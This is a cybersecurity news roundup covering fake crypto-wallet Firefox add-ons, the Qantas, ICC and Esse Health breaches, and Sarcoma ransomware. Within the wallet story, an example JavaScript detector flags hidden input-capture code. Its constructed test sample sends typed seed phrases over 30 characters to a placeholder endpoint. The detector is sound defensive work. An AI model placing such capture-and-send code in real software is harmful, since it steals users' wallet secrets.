Fake Wallet Extensions, Qantas Hack Revealed, ICC Cyberattack Unveiled – Cybersecurity News [June 30, 2025]
This week’s cybersecurity round-up brings you stories you need to know, from fake crypto wallets lurking in Firefox to major breaches hitting airlines, global courts, and healthcare groups. We’ll see how threat actors are shifting from traditional tactics and which new threats are on the radar.
Stay digitally safe and well-informed about your personal information security!
Fake Crypto Wallet Extensions Swarm Firefox Add-on Store to Steal Funds
Many fake browser extensions on Firefox’s official add-on store are posing as known cryptocurrency wallets to steal sensitive user data.
They claim to be from trusted names like MetaMask, Coinbase, Trust Wallet, Phantom, Exodus, OKX, Keplr, and MyMonero. But behind the familiar logos and names lies malicious code that silently redirects your wallet information to servers controlled by attackers. Security researchers at Koi discovered these fake add-ons and found strong signs that a threat actor group might be responsible. Most of the extensions are copied and pasted from open-source versions of legitimate wallets, with some extra lines of code thrown in to monitor what you type and click.
If you enter anything that looks like a wallet key or seed phrase (usually over 30 characters), it gets silently grabbed and sent off to the hackers. Plus, error messages are hidden by setting their opacity to zero, so you won’t even see them. The underlying risk here is serious: the seed phrase is basically the master key to your crypto wallet. If someone gets hold of it, they can clean out your wallet in one move, and there is no way to reverse it.
These fake extensions have been around since at least April, with new ones still popping up. As of now, Mozilla hasn’t issued a public response, and many of the malicious extensions are still available. Best be cautious.
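Because the fakes are described as upstream wallet code plus a few extra lines, one way to triage a suspect add-on is to diff its scripts against the open-source file and check only the added lines for the behaviours above. The following is an added example, not code from Koi or from any real extension; the sample sources, the names `field` and `ENDPOINT`, and the indicator patterns are constructed for illustration.

```javascript
// Added example; sample sources and names (ENDPOINT, field) are constructed.
// Each indicator mirrors one behaviour the article attributes to the fakes.
const INDICATORS = {
  "input-hook": (s) =>
    /addEventListener\s*\(\s*["'](input|keyup|keydown|paste|change)["']/.test(s),
  "length-gate": (s) => {
    const m = s.match(/\.length\s*>=?\s*(\d+)/);
    return m !== null && Number(m[1]) >= 30; // "usually over 30 characters"
  },
  "network-send": (s) => /\b(fetch|XMLHttpRequest|sendBeacon|WebSocket)\b/.test(s),
  "hidden-ui": (s) => /opacity\s*[:=]\s*["']?0(?:\.0+)?(?![\d.])/.test(s),
};

// Lines present in the candidate but absent from the upstream file.
function addedLines(upstreamSrc, candidateSrc) {
  const known = new Set(upstreamSrc.split("\n").map((l) => l.trim()));
  return candidateSrc.split("\n")
    .map((text, i) => ({ line: i + 1, text: text.trim() }))
    .filter((l) => l.text !== "" && !known.has(l.text));
}

function triage(upstreamSrc, candidateSrc) {
  const added = addedLines(upstreamSrc, candidateSrc);
  const hits = [];
  for (const l of added)
    for (const [id, matches] of Object.entries(INDICATORS))
      if (matches(l.text)) hits.push({ indicator: id, line: l.line });
  const ids = new Set(hits.map((h) => h.indicator));
  // Capture plus send is the combination that matters; either alone is common.
  const verdict = ids.has("input-hook") && ids.has("network-send")
    ? "review-urgently" : ids.size > 0 ? "review" : "matches-upstream";
  return { addedCount: added.length, hits, verdict };
}

const UPSTREAM = `function showError(el, msg) {
  el.textContent = msg;
}
function unlock(form) {
  return form.password.value.length > 0;
}`;
const CANDIDATE = UPSTREAM.replace("msg;", 'msg;\n  el.style.opacity = "0";') + `
field.addEventListener("input", (e) => {
  if (e.target.value.length > 30) {
    navigator.sendBeacon(ENDPOINT, e.target.value);
  }
});`;

console.log(triage(UPSTREAM, CANDIDATE));
```

The line comparison is a set difference on trimmed text, so it is a quick triage aid; minified or reformatted code needs a proper diff against the matching upstream release.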
Qantas Reveals Cyberattack Linked to Scattered Spider Aviation Hacks
Qantas, Australia’s biggest airline, has revealed that hackers broke into a third-party platform tied to its customer data, leading to a serious breach.
The airline spotted strange activity on a third-party system used by one of its call centers and quickly shut it down to stop further damage. Although the airline’s own systems stayed secure, it believes a large amount of customer data was stolen. About 6 million customers have service records stored on the affected platform. The full extent of the leak is still under investigation, but early checks show that names, email addresses, phone numbers, birth dates, and frequent flyer numbers were exposed.
The good news is that no credit card details, banking information, or account passwords were compromised in the incident. Qantas has already informed the Australian Cyber Security Centre, the privacy watchdog, and federal police about the incident. It’s not yet confirmed if outside cybersecurity firms are helping with the investigation.
Qantas says it has contained the breach and is continuing to check what data was taken. If you’re a customer, keep an eye on your emails for updates from the airline and practice good email security by avoiding suspicious messages that ask for personal details.
International Criminal Court Targeted by New Advanced Cyberattack
The International Criminal Court, which handles cases like war crimes and genocide, says it’s investigating a new cyberattack discovered last week that it describes as “Sophisticated” and “Targeted.”
The Court’s security systems were able to detect the attack in time, and officials contained it quickly. They are still figuring out how much damage was done and if any sensitive data was touched. This is the second time the ICC has faced such an incident in recent years: back in September 2023, its systems were breached for espionage purposes. At that time, the threat actors carried out a careful and advanced intrusion aimed at gathering intelligence, which the ICC saw as a serious threat to its work. However, no evidence showed that data from ongoing cases or witnesses was stolen. The Court also shared that it faces daily attempts to break into its systems and even caught an intelligence officer who nearly infiltrated it under the cover of being an intern.
For now, the ICC hasn’t named any suspects or said if data was leaked. Keep your software updated and follow trusted news sources for any newly released warnings.
Esse Health Reports Data Breach Impacting 263,000+ Patient Records
Over 263,000 patients of Esse Health are being warned that hackers stole their personal and health data during an April cyberattack.
On April 21, hackers broke into Esse Health’s network, knocking out patient-facing systems and phone lines, which stayed down until June 2, when everything was finally restored. While inside the network, cybercriminals viewed and copied files containing names, addresses, birth dates, health insurance details, medical record numbers, patient account numbers, and some health information, though social security numbers and the NextGen electronic medical records system weren’t affected.
Esse Health spent significant time reviewing the compromised files to figure out exactly whose data was exposed and sent letters to 263,601 people explaining what happened. Although Esse Health hasn’t confirmed what type of attack took place, experts suspect ransomware because of how long systems were offline, yet no ransomware group has admitted to it.
Right now, Esse Health urges you to check your accounts and credit reports and is offering free identity protection if you sign up by September 25, 2025, to help you stay protected.
Swiss Government Confirms Data Theft in Ransomware Incident
Switzerland’s government says sensitive data from several federal offices has been exposed after a ransomware attack hit Radix, a non-profit group in Zurich handling health projects for government agencies.
The Sarcoma ransomware group, which popped up in October 2024 and quickly targeted dozens of victims, including electronics maker Unimicron, broke into Radix systems on June 16. Sarcoma usually sneaks in using phishing, old security flaws, or supply-chain gaps, then takes advantage of remote desktop connections to roam networks, stealing and sometimes locking data. After Radix refused to pay, the attackers dumped a massive 1.3TB of data on the dark web on June 29, containing scans of documents, financial records, contracts, and private communications, offering it free for download. The organization has notified everyone who was affected and insists there’s no sign that partner organizations’ sensitive data was hit.
Meanwhile, Swiss authorities and the National Cyber Security Centre are still digging through the leaked files. So, watch out for phishing attempts, suspicious emails, or anyone trying to steal your passwords or financial details.